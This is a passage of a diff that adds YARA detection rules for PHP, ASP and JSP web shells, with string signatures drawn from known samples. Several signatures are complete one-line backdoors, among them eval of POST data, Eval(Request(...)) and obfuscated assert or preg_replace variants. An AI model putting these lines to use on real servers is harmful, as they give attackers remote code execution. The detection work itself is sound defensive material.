+      $s1 = "$dires = $dires . $directory;" fullword
+      $s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_nst_php_cybershell_RID322E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 13:54:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ef8828e0bc0641a655de3932199c0527"
+      hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
+      hash3 = "4745d510fed4378e4b1730f56f25e569"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "@$rto=$_POST['rto'];" fullword
+      $s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
+      $s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_c99_generic2_RID2EE9 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated "
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 11:34:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "433706fdc539238803fd47c4394b5109"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":" 
+      $s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_c99shell_v1_PHP_RID2FE0 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:15:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+      hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
+      hash3 = "d089e7168373a0634e1ac18c0ee00085"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_multiple_php_webshells_2_RID3472 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated "
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 15:30:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I" 
+      $s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma" 
+      $s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_SpecialShell_99_php_php_a_RID343E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 15:22:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3ca5886cd54d495dc95793579611f59a"
+      hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+      hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if ($total === FALSE) {$total = 0;}" fullword
+      $s1 = "$free_percent = round(100/($total/$free),2);" fullword
+      $s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
+      $s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_r577_php_spy_2_RID2FAE : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 12:07:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+      hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+      hash3 = "817671e1bdc85e04cc3440bbd9288800"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
+      $s2 = "'eng_text30'=>'Cat file'," fullword
+      $s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_c99php_NIX_REMOTE_WEB_SHELL_RID3350 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-29 14:42:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
+      hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
+      hash3 = "f3ca29b7999643507081caab926e2e74"
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
+      $s1 = "$ret = posix_kill($pid,$sig);" fullword
+      $s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
+      $s3 = "$i = $nixpasswd;" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_webshells_new_con2_RID31E9 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file con2.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:42:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e" 
+      $s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_make2_RID3247 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file make2.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:58:21"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8" 
+   condition: 
+      all of them
+}
+
+rule Webshell_webshells_new_php2_RID31F1 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file php2.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:44:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php $s=@$_GET[2];if(md5($s.$s)==" 
+   condition: 
+      all of them
+}
+
+rule Webshell_bypass_iisuser_p_RID316A : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file bypass-iisuser-p.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:21:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject" 
+   condition: 
+      all of them
+}
+
+rule Webshell_webshells_new_pppp_RID3237 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file pppp.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:55:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Mail: chinese@hackermail.com" fullword
+      $s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo " 
+      $s6 = "Site: http://blog.weili.me" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_jspyyy_RID332F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file jspyyy.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 14:37:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")" 
+   condition: 
+      all of them
+}
+
+rule Webshell_webshells_new_xxxx_RID3257 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file xxxx.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 14:01:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php eval($_POST[1]);?>  " fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_webshells_new_JJjsp3_RID328B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file JJjsp3.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 14:09:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S" 
+   condition: 
+      all of them
+}
+
+rule Webshell_webshells_new_radhat_RID32EB : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file radhat.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 14:25:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "sod=Array(\"D\",\"7\",\"S" 
+   condition: 
+      all of them
+}
+
+rule Webshell_webshells_new_asp1_RID31EC : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file asp1.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:43:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
+      $s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_php6_RID31F5 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file php6.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:44:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "array_map(\"asx73ert\",(ar" 
+      $s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
+      $s4 = "shell.php?qid=zxexp  " fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_xxx_RID31DF : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file xxx.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:41:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_GetPostpHp_RID2E94 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file GetPostpHp.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 11:20:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
+   condition: 
+      all of them
+}
+
+rule Webshell_webshells_new_php5_RID31F4 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file php5.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:44:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u" 
+   condition: 
+      all of them
+}
+
+rule Webshell_webshells_new_Asp_RID319B : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file Asp.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:29:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
+      $s2 = "Function MorfiCoder(Code)" fullword
+      $s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_aaa_RID319A : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file aaa.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:29:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\"" 
+      $s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL" 
+      $s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Expdoor_com_ASP_RID3068 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file Expdoor.com ASP.asp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 12:38:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "\">www.Expdoor.com</a>" fullword
+      $s5 = "    <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max" 
+      $s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True)  '" fullword
+      $s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\")   '" fullword
+      $s16 = "<TITLE>Expdoor.com ASP" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_sig_404super_RID2F0F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file 404super.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 11:41:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
+      $s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
+      $s7 = "//http://require.duapp.com/session.php" fullword
+      $s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
+      $s12 = "//define('pass','123456');" fullword
+      $s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_JSP_RID3164 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file JSP.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:20:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i" 
+      $s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app" 
+      $s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshell_123_RID2EF1 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file webshell-123.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 11:36:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "// Web Shell!!" fullword
+      $s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6" 
+      $s3 = "$default_charset = \"UTF-8\";" fullword
+      $s4 = "// url:http://www.weigongkai.com/shell/" fullword
+   condition: 
+      2 of them
+}
+
+rule Webshell_dev_core_RID2DED : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file dev_core.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 10:52:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
+      $s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
+      $s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874" 
+      $s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))" 
+      $s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C" 
+      $s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_pHp_RID319F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file pHp.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:30:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
+      $s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr" 
+      $s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*" 
+      $s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+" 
+      $s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_code_RID3212 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file code.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:49:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi" 
+      $s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO" 
+      $s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_" 
+      $s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:" 
+      $s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_PHP1_RID3190 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file PHP1.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:27:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
+      $s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
+      $s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_JJJsp2_RID326A : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file JJJsp2.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 14:04:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z" 
+      $s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ" 
+      $s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()" 
+      $s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase(" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_webshells_new_PHP_RID315F : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Web shells - generated from file PHP.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-03-28 13:19:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"<font color=blue>Error!</font>\";" fullword
+      $s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE" 
+      $s5 = " - ExpDoor.com</title>" fullword
+      $s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
+      $s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
+   condition: 
+      1 of them
+}
+
+rule Webshell_PHP_sql_RID2D3D : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file sql.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:23:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_" 
+      $s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" 
+   condition: 
+      all of them
+}
+
+rule Webshell_iMHaPFtp_2_RID2E10 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file iMHaPFtp.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 10:58:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($" 
+      $s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_Jspspyweb_RID2E6D : DEMO SCRIPT T1050 T1100 T1112 WEBSHELL {
+   meta:
+      description = "Web Shell - file Jspspyweb.jsp"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 11:14:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1050, T1100, T1112, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7" 
+      $s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control" 
+   condition: 
+      all of them
+}
+
+rule Webshell_phpshell_2_1_pwhash_RID3211 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file pwhash.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:49:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi" 
+      $s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\"," 
+   condition: 
+      1 of them
+}
+
+rule Webshell_PHPRemoteView_RID2F95 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file PHPRemoteView.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 12:03:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'" 
+      $s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u" 
+   condition: 
+      1 of them
+}
+
+rule Webshell_caidao_shell_guo_RID3128 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Web Shell - file guo.php"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2014-01-28 13:10:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<?php ($www= $_POST['ice'])!" 
+      $s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww" 
+   condition: 
+      1 of them
+}
+
